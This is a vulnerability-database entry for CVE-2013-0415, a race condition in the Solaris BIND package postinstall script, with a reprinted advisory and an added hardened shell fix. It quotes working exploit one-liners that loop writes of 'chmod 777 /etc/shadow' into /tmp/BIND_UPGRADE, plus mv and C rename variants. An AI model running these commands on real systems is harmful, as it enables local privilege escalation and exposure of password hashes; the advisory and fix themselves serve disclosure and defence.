Oracle Sun Products Suite Local Security Vulnerability

Vulnerability ID: 1169663    Type: Unknown
Published: 2013-01-15    Updated: 2013-07-22
CVE: CVE-2013-0415    CNNVD-ID: CNNVD-201301-280
Platform: N/A    CVSS score: 6.0
|Vulnerability source
https://www.securityfocus.com/bid/57403
https://cxsecurity.com/issue/WLB-2018100057
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201301-280
|Vulnerability details
Oracle Solaris is a Unix-like operating system from Oracle Corporation (USA). An unspecified vulnerability exists in Oracle Sun Solaris 10. Through unknown vectors related to the Bind/Postinstall script in the Bind package, a local attacker can exploit it to affect confidentiality, integrity and availability.
|Exploit
Title: Oracle Solaris Bind/Postinstall script for Bind package local root
Author: Larry W. Cashdollar, @_larry0
Date: 2013-01-14
CVE-ID:[CVE-2013-0415]
Download Site: www.oracle.com
Vendor: Oracle Systems
Vendor Notified: 2013-01-15
Vendor Contact: security@oracle.com
Advisory: http://www.vapid.dhs.org/advisories/solaris_patch_cluster_race.html
Description: Solaris Sparc patch cluster January 2013.
Vulnerability:
If the system administrator is updating the system using update manager or smpatch (multi user mode) a race condition exists with the postinstall script for SUNWbindr that may lead to arbitrary code execution as root if the race is won.

vulnerable code in:

./patches/119784-22/SUNWbindr/install/pkg_postinstall: UPGRADE=${TMP}/BIND_UPGRADE
./patches/119784-22/SUNWbindr/install/postinstall: UPGRADE=${TMP}/BIND_UPGRADE

vulnerable code:

UPGRADE=${TMP}/BIND_UPGRADE
rm -f $UPGRADE

(If I create the file first between these two steps, I should have ownership before it is over written and inject malicious code to get root.)

cat >> $UPGRADE <<-\UPDATESTART_METHOD
oset=$@ # Remember current options if any.
svc="svc:network/dns/server"
if [ -z "$TMP" ]; then
TMP="/tmp"
fi
Exploit Code:
If the following is run:
 
while (true) ; do touch /tmp/BIND_UPGRADE ;echo "chmod 777 /etc/shadow" > /tmp/BIND_UPGRADE; done
 
during patch installation you can get /etc/shadow world writeable.
 
Vladz suggested:
 
Another approach to exploit this is to place your evil command in a file called /tmp/BIND_UPGRADE.new, and loop the move command.
 
$ while ! mv /tmp/BIND_UPGRADE.new /tmp/BIND_UPGRADE 2>/dev/null; do continue; done
 
or in C:
 
while (rename("/tmp/BIND_UPGRADE.new", "/tmp/BIND_UPGRADE") != 0) continue;
 
I mention this because I think moving a file takes fewer syscalls (at least one fewer) than an "echo string >> file", which open()s, write()s and close()s the file.
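The root cause above is that the postinstall script writes to a predictable, world-writable location (${TMP}/BIND_UPGRADE) with an rm-then-append sequence, which any local user can race. The following is an added example (it is not Oracle's code and not part of the advisory) showing the pattern a package script should use instead: stage the file inside a freshly created mode-0700 directory and create it with O_EXCL semantics so a pre-planted file or symlink makes the write fail instead of being overwritten or followed. It assumes mktemp -d is available and takes the base directory as an optional first argument so it can be exercised against a scratch directory; the function names and the base-directory argument are hypothetical.

```shell
#!/bin/sh
# Added example (not Oracle's code): a hardened way to stage the BIND upgrade
# script that removes the race on the predictable path ${TMP}/BIND_UPGRADE.
# Assumptions: mktemp -d exists; the caller may pass a base directory as $1
# (defaults to $TMPDIR, then /tmp).

# create_exclusive PATH: create PATH only if nothing exists there yet.
# 'set -C' (noclobber) makes the shell open the target with O_CREAT|O_EXCL,
# so a file or symlink planted by another user at PATH causes the
# redirection to fail rather than being silently overwritten or followed.
create_exclusive() {
    ( set -C; : > "$1" ) 2>/dev/null
}

# safe_upgrade_file [BASE]: write the upgrade script into a fresh, mode-0700
# directory that only the installing user can enter, then print its path.
# The body is a subshell, so the umask change does not leak to the caller.
safe_upgrade_file() (
    base="${1:-${TMPDIR:-/tmp}}"
    umask 077
    # Unpredictable, private directory: no other user can pre-create or
    # link anything inside it, which is what made the original path racy.
    dir=$(mktemp -d "$base/bind_upgrade.XXXXXX") || return 1
    f="$dir/BIND_UPGRADE"
    create_exclusive "$f" || return 1
    if [ -L "$f" ]; then          # belt and braces: never write through a symlink
        return 1
    fi
    # Same heredoc content the advisory quotes, now written to a path that
    # nobody else can reach.
    cat >> "$f" <<'UPDATESTART_METHOD'
oset=$@   # Remember current options if any.
svc="svc:network/dns/server"
UPDATESTART_METHOD
    printf '%s\n' "$f"
)
```

The two properties that matter for the fix are visible in the code: the directory name is unguessable and not writable by anyone else, and the file is opened exclusively, so the rm-then-append window the advisory describes no longer exists. A script that still needs a fixed path should at least apply create_exclusive and treat a failure as an error rather than proceeding.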
|Affected products
Xerox FreeFlow Print Server (FFPS) 73.C0.41 Xerox FreeFlow Print Server (FFPS) 73.B3.61 Avaya IR 4.0 Avaya Call Management System R 16.0
|References

Source: www.oracle.com
Link: http://www.oracle.com/technetwork/topics/security/cpujan2013-1515902.html
Source: SECUNIA
Name: 51892
Link: http://secunia.com/advisories/51892
Source: BID
Name: 57403
Link: http://www.securityfocus.com/bid/57403